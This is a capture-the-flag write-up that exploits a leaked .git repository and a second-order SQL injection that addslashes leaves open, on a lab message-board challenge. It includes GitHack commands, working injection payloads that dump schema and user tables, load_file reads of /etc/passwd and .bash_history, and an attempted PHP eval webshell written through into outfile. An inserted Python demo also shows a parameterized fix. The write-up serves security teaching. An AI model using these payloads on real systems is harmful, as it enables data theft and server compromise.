Keywords: git repository leak, code audit, addslashes, secondary injection, SQL injection, MySQL hex query
Foreword
Git is an open source distributed version control system for agile and efficient handling of any project, small or large. At present a large number of developers use git for version control and automatic deployment of their sites. If it is not configured properly, the .git folder may be deployed directly to the live environment, which causes the git leak vulnerability. An attacker can use this vulnerability to download the whole contents of the .git folder. If the files contain sensitive information, such as site source code or database account passwords, the attacker can use what is collected to attack the server.
Original address
Offense and Defense World (xctf.org.cn) https://adworld.xctf.org.cn/challenges/list
After opening the challenge: log in and look at the message board.
Trying to post redirects to a login page.
The placeholder attribute in the form seems to indicate that the username is zhangwei and that the password starts with zhangwei***. Here we can try whether the form is vulnerable to SQL injection! The universal passwords ' or '1 and zhangwei'# all failed; if that does not work, just run a dictionary...
Look at the traffic just captured. When we click the submit button, the form posts to write_do.php?do=write, but because there is no login session it is redirected to login.php, which asks us to log in.
These are all prefaces. The git repository is the focus of this CTF challenge.
Git repository leak
1. Git repository discovery
Scanning the directory with dirsearch, we find that there is a .git directory:
dirsearch -u http://61.147.171.105:56303/
Trying to download the .git directory directly: access to the directory is forbidden, so a script is needed.
┌──(kali㉿kali)-[~]
└─$ wget -r http://61.147.171.105:56303/.git
--2023-0x-xx 08:31:09--  http://61.147.171.105:56303/.git
Connecting to 61.147.171.105:56303... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: http://61.147.171.105:56303/.git/ [following]
--2023-0x-xx 08:31:09--  http://61.147.171.105:56303/.git/
Reusing existing connection to 61.147.171.105:56303.
HTTP request sent, awaiting response... 403 Forbidden
2023-0x-xx 08:31:09 ERROR 403: Forbidden.
2. Git repository download
Download GitHack
git clone https://github.com/BugScanTeam/GitHack
GitHack (BugScanTeam) is a .git leak exploitation tool that restores historical versions. Use it to try to download the git repository:
python2 GitHack.py http://61.147.171.105:56303/.git/
3. Analysis of git library code version information
Go into the folder created by GitHack and get ready to use the git command:
cd 61.147.171.105_56303 ; ls
The code at this version does not look finished yet:
<?php
include "mysql.php";
session_start();
if($_SESSION['login'] != 'yes'){
    header("Location: ./login.php");
    die();
}
if(isset($_GET['do'])){
    switch ($_GET['do'])
    {
        case 'write':
            break;
        case 'comment':
            break;
        default:
            header("Location: ./index.php");
    }
}
else{
    header("Location: ./index.php");
}
?>
Files in the Git working directory can be in several modification states (added, deleted, updated), and those states change as we run Git commands.
Our main focus is the commit log:
git log --reflog
You can see that there are three versions in the history, and that comment-related information currently sits at the position of the first version.
git reflog
Querying with git reflog also confirms that the author deliberately rolled the repository back to version bfbdf218. But we can still get back to version e5b2 by other means, which shows that a rollback does not delete the earlier version.
Here I use the diff command to see what was added and changed between versions, which is convenient for the code audit.
There is no difference between the first and second versions.
Compare the first version with the third version:
└─$ git diff bfbdf218902476c5c6164beedd8d2fcf593ea23b e5b2a2443c2b6d395d06960123142bc91123148c
Roll back to the e5b2 version to view the code:
git reset --hard e5b2a2443c2b6d395d06960123142bc91123148c
cat write_do.php
<?php
include "mysql.php";
session_start();
if($_SESSION['login'] != 'yes'){
    header("Location: ./login.php");
    die();
}
if(isset($_GET['do'])){
    switch ($_GET['do'])
    {
        case 'write':
            $category = addslashes($_POST['category']);
            $title = addslashes($_POST['title']);
            $content = addslashes($_POST['content']);
            $sql = "insert into board
                set category = '$category',
                title = '$title',
                content = '$content'";
            $result = mysql_query($sql);
            header("Location: ./index.php");
            break;
        case 'comment':
            $bo_id = addslashes($_POST['bo_id']);
            $sql = "select category from board where id='$bo_id'";
            $result = mysql_query($sql);
            $num = mysql_num_rows($result);
            if($num>0){
                $category = mysql_fetch_array($result)['category'];
                $content = addslashes($_POST['content']);
                $sql = "insert into comment
                    set category = '$category',
                    content = '$content',
                    bo_id = '$bo_id'";
                $result = mysql_query($sql);
            }
            header("Location: ./comment.php?id=$bo_id");
            break;
        default:
            header("Location: ./index.php");
    }
}
else{
    header("Location: ./index.php");
}
?>
SQL secondary injection
Code audit (the analysis is in the comments):
<?php
include "mysql.php";
session_start();
if($_SESSION['login'] != 'yes'){
    header("Location: ./login.php"); // no session info: redirected to login.php, so we must log in first
    die();
}
if(isset($_GET['do'])){ // the do parameter is passed via GET
    switch ($_GET['do'])
    {
        case 'write': // ?do=write
            $category = addslashes($_POST['category']);
            $title = addslashes($_POST['title']);
            $content = addslashes($_POST['content']); // special characters in the category, title and content parameters are escaped by addslashes
            $sql = "insert into board
                set category = '$category',
                title = '$title',
                content = '$content'";
            $result = mysql_query($sql); // execute the INSERT statement
            header("Location: ./index.php");
            break;
        // searching the web for "addslashes sql injection" gave an important lead: addslashes leaves the possibility of secondary injection
        // reference: https://blog.csdn.net/weixin_52501704/article/details/126863948
        case 'comment':
            $bo_id = addslashes($_POST['bo_id']);
            $sql = "select category from board where id='$bo_id'";
            $result = mysql_query($sql); // here, as suspected, a second query is made
            $num = mysql_num_rows($result);
            if($num>0){
                $category = mysql_fetch_array($result)['category']; // category is controllable and is concatenated into SQL, so injection is possible
                $content = addslashes($_POST['content']); // get content; data from the board table is copied into the comment table
                $sql = "insert into comment
                    set category = '$category',
                    content = '$content',
                    bo_id = '$bo_id'";
                // suppose the input is the following (/* */ is a multi-line comment, # is a single-line comment):
                // $category = 1',content=database(),/*
                // $content  = */#
                // the statement then becomes:
                // insert into comment
                //     set category = '1',content=database(),/*',
                //     content = '*/#',
                //     bo_id = '$bo_id'
                $result = mysql_query($sql); // execute the SQL statement that carries the secondary injection risk
            }
            header("Location: ./comment.php?id=$bo_id");
            break;
        default:
            header("Location: ./index.php");
    }
}
else{
    header("Location: ./index.php");
}
?>
The figure below shows that addslashes adds no backslash to */#.
Although addslashes turns ' into \', the backslash is gone once the value has been inserted into the database.
addslashes therefore leaves the possibility of secondary injection. Reference: Study Notes-SQL Injection-2: addslashes SQL injection (H1111B's blog, CSDN), SQL Injection - Secondary Injection (Principle) https://blog.csdn.net/weixin_52501704/article/details/126863948
The principle of secondary injection: when data is first inserted into the database, only addslashes (or get_magic_quotes_gpc) is used to escape the special characters in it. But addslashes has a characteristic: although it prefixes ' with \ for escaping, the backslash is not inserted into the database, and the original data is kept when the row is written.
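To make the principle concrete, here is an added example (not code from the challenge or the write-up) that models the two steps of write_do.php in SQLite: the first insert stores the raw quote exactly as MySQL would after unescaping addslashes output, and the comment step reads that value back and concatenates it into a second INSERT. MySQL-only syntax is swapped for SQLite equivalents, which is an assumption of this model: `insert ... set` becomes `insert ... values`, `database()` becomes `sqlite_version()`, and the `#` line comment becomes `--`. The hardened `comment_safe` binds every value, including the one fetched from the database, which is the fix for this class of bug.

```python
import sqlite3

# Added example, not the challenge's own code: a SQLite model of the
# second-order injection in write_do.php (MySQL syntax swapped for SQLite).


def addslashes(s: str) -> str:
    """Port of PHP addslashes(): prefix ' " \\ and NUL with a backslash."""
    out = []
    for ch in s:
        if ch in "'\"\\":
            out.append("\\" + ch)
        elif ch == "\0":
            out.append("\\0")
        else:
            out.append(ch)
    return "".join(out)


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "create table board(id integer primary key, category text, title text, content text);"
        "create table comment(id integer primary key, category text, content text, bo_id text);"
    )
    return conn


def write_board(conn: sqlite3.Connection, category: str, title: str, content: str) -> int:
    """Model of ?do=write. In MySQL the addslashes() output \\' is unescaped by the
    parser, so the table ends up holding the raw quote. SQLite has no backslash
    escapes, so the same end state is produced here with bound parameters."""
    cur = conn.execute(
        "insert into board(category, title, content) values (?, ?, ?)",
        (category, title, content),
    )
    return cur.lastrowid


def comment_vulnerable(conn: sqlite3.Connection, bo_id: str, content: str) -> str:
    """Model of ?do=comment as written: category is read back from board and
    concatenated into the second INSERT with no escaping. Returns the SQL run."""
    row = conn.execute("select category from board where id = ?", (bo_id,)).fetchone()
    if row is None:
        return ""
    category = row[0]  # trusted only because it "came from the database"
    # content and bo_id still pass through addslashes(), as in the PHP
    sql = (
        "insert into comment(category, content, bo_id) values "
        f"('{category}', '{addslashes(content)}', '{addslashes(bo_id)}')"
    )
    conn.execute(sql)
    return sql


def comment_safe(conn: sqlite3.Connection, bo_id: str, content: str) -> None:
    """Fixed version: every value, including the one fetched from the database,
    is bound as a parameter, so a stored quote can never become SQL syntax."""
    row = conn.execute("select category from board where id = ?", (bo_id,)).fetchone()
    if row is None:
        return
    conn.execute(
        "insert into comment(category, content, bo_id) values (?, ?, ?)",
        (row[0], content, bo_id),
    )


# Constructed inputs mirroring the write-up's  1',content=database(),/*  and  */#
CATEGORY_PAYLOAD = "x', (select sqlite_version()), '1') /*"
CONTENT_PAYLOAD = "*/ --"


def demo() -> dict:
    """Run both code paths against the same stored board row and return what each stored."""
    conn = make_db()
    bo_id = str(write_board(conn, CATEGORY_PAYLOAD, "t", "c"))
    comment_vulnerable(conn, bo_id, CONTENT_PAYLOAD)
    vuln = conn.execute("select category, content from comment").fetchone()
    conn.execute("delete from comment")
    comment_safe(conn, bo_id, CONTENT_PAYLOAD)
    safe = conn.execute("select category, content from comment").fetchone()
    return {"vulnerable": vuln, "safe": safe, "sqlite_version": sqlite3.sqlite_version}


if __name__ == "__main__":
    print(demo())
</```

In the vulnerable path the stored category becomes `x` and the stored content becomes the SQLite version string, i.e. the comment-opening quote from the first request was executed as SQL on the second request; in the safe path both payloads are stored verbatim as text.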
We need to obtain a login session before exploiting the vulnerability.
Brute-force the user password
Brute-force the password of user zhangwei:
1. Under Intruder, select the parameter position to attack
2. Set the payload
3. Analyse the result: the password is zhangwei666
Secondary Injection Exploitation
Logged in; ready to post a message, which submits to write_do.php?do=write.
From the analysis we also know that the message-posting form is the secondary injection point we are looking for.
Input content = */#
As expected, the response here is different. There really is a secondary SQL injection, and it also shows that the current database is ctf.
Construct the SQL injection point:
1', content=(select 123), /*
Query the tables under the database ctf:
1', content=(select group_concat(table_name) from information_schema.tables where table_schema='ctf'), /*
(content = */# )
Query the columns of the user table:
1',content=(Select group_concat(column_name) from information_schema.columns where table_name='user'),/*
Returned columns:
id,username,password,Host,User,Password,Select_priv,Insert_priv,Update_priv,Delete_priv,Create_priv,Drop_priv,Reload_priv,Shutdown_priv,Process_priv,File_priv,Grant_priv,References_priv,Index_priv,Alter_priv,Show_db_priv,Super_priv,Create_tmp_table_priv,Lock_tables_priv,Execute_priv,Repl_slave_priv,Repl_client_priv,Create_view_priv,Show_view_priv,Create_routine_priv,Alter_routine_priv,Create_user_priv,Event_priv,Trigger_priv,Create_tablespace_priv,ssl_type,ssl_cipher,x509_issuer,x509_subject,max_questions,max_updates,max_connections,max_user_connections,plugin,authentication_string
Query the data in those columns:
1', content=(select concat_ws(':', id, username, password) from user), /*
After a long time trying, I failed to find any clue to the flag in the database.
Check whether there is file export/import permission. It is hard to check under the current conditions, so we directly try to write a webshell, guessing that the web root is under /var/www:
select '<?php @eval($_get["cmd"])?>' into outfile "/var/www/shell.php"
1',content=(select '<?php @eval($_get["cmd"])?>' into outfile "/var/www/shell.php" ),/*
1',content=(select 123 into outfile "/var/www/shell.txt" ),/*
I tried a lot here; it seems the one-line webshell is filtered, and even 123 was not written successfully.
Then use load_file to read other important files, using a dedicated dictionary to collect as much information as possible.
Reference dictionary:
1',content=(select load_file('/etc/passwd')),/*
Found that the www user's command history records the commands the user executed:
1',content=(select load_file('/home/www/.bash_history')),/*
The history shows cd /tmp, unzipping html.zip, copying it to /var/www/, entering /var/www and deleting the file .DS_Store.
We can look in /tmp to see what the deleted .DS_Store hides:
1',content=(select hex(load_file('/tmp/html/.DS_Store'))),/*
Is this a normal string? Copy it.
MySQL hex query
There are indications that this file is not plain text. Since MySQL provides the hex function, we extract the file's binary data as hex:
1',content=(select hex(load_file('/tmp/html/.DS_Store'))),/*
This returns a large block of binary data.
For the binary data I give two ways to decode it.
00000001427564310000100000000800000010000000040A000000000000000000000000000000000000000000000800000008000000000000000000000000000000000000000002000000000000000B000000010000100000730074007200610070496C000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000B000000090062006F006F007400730074007200610070496C6F63626C6F62000000100000004600000028FFFFFFFFFFFF00000000000B0063006F006D006D0065006E0074002E007000680070496C6F63626C6F6200000010000000CC0000002800000001FFFF000000000003006300730073496C6F63626C6F62000000100000015200000028FFFFFFFFFFFF0000000000190066006C00610067005F0038003900340036006500310066006600310065006500330065003400300066002E007000680070496C6F63626C6F6200000010000001D800000028FFFFFFFFFFFF0000000000050066006F006E00740073496C6F63626C6F62000000100000004600000098FFFFFFFFFFFF0000000000090069006E006400650078002E007000680070496C6F63626C6F6200000010000000CC0000009800000002FFFF000000000002006A0073496C6F63626C6F62000000100000015200000098FFFFFFFFFFFF000000000009006C006F00670069006E002E007000680070496C6F63626C6F6200000010000001D800000098FFFFFFFFFFFF000000000009006D007900730071006C002E007000680070496C6F63626C6F62000000100000004600000108FFFFFFFFFFFF00000000000600760065006E0064006F0072496C6F63626C6F6200000010000000CC00000108FFFFFFFFFFFF00000000000C00770072006900740065005F0064006F002E007000680070496C6F63626C6F62000000100000015200000108FFFFFFFFFFFF000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000080B000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000200000000100000040000000010000008000000001000001000000000100000200000000010000040000000000000000010000100000000001000020000000000100004000000000010000800000000001000100000000000100020000000000010004000000000001000800000000000100100000000000010020000000000001004000000000000100800000000000010100000000000001020000000000000104000000000000010800000000000001100000000000000120000000000000014000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000003000000000000100B000000450000040A00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001044453444200000001000000000000000000000000000000000000000000000002000000200000006000000000000000010000008000000001000001000000000100000200000000000000000200000800000018000000000000000001000020000000000100004000000000010000800000000001000100000000000100020000000000010004000000000001000800000000000100100000000000010020000000000001004000000000000100800000000000010100000000000001020000000000000104000000000000010800000000000001100000000000000120000000000000014000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
The first uses CyberChef (gchq.github.io) https://gchq.github.io/CyberChef/
Paste the hex into the input and decode it with From Hex.
The second uses a hex editor.
Create a new txt file, open it with the hex editor, paste in the binary data, and the decoded text appears on the right.
Accessing the page shows that this file does exist, but nothing is displayed. Use the secondary SQL injection again to read it:
1',content=(select load_file('/var/www/html/flag_8946e1ff1ee3e40f.php')),/*
In the source code we get the flag:
$flag="flag{0dd14aae81d94904b3492117e2a3d4df}
References
Git exploitation tool
https://github.com/BugScanTeam/GitHack
SQL secondary injection via addslashes
Study Notes-SQL Injection-2: addslashes SQL injection, H1111B's Blog (CSDN) https://blog.csdn.net/weixin_52501704/article/details/126863948
Git usage tutorial
Dark Horse Programmer Git complete tutorial (Git project management tool), bilibili
File-inclusion dictionary
Auto_Wordlists/wordlists at main, carlospolop/Auto_Wordlists, GitHub
Hex decoding
CyberChef https://gchq.github.io/CyberChef/
HEX to character conversion (hex, gb2312, gbk, utf8 Chinese character internal code), The X Online Tools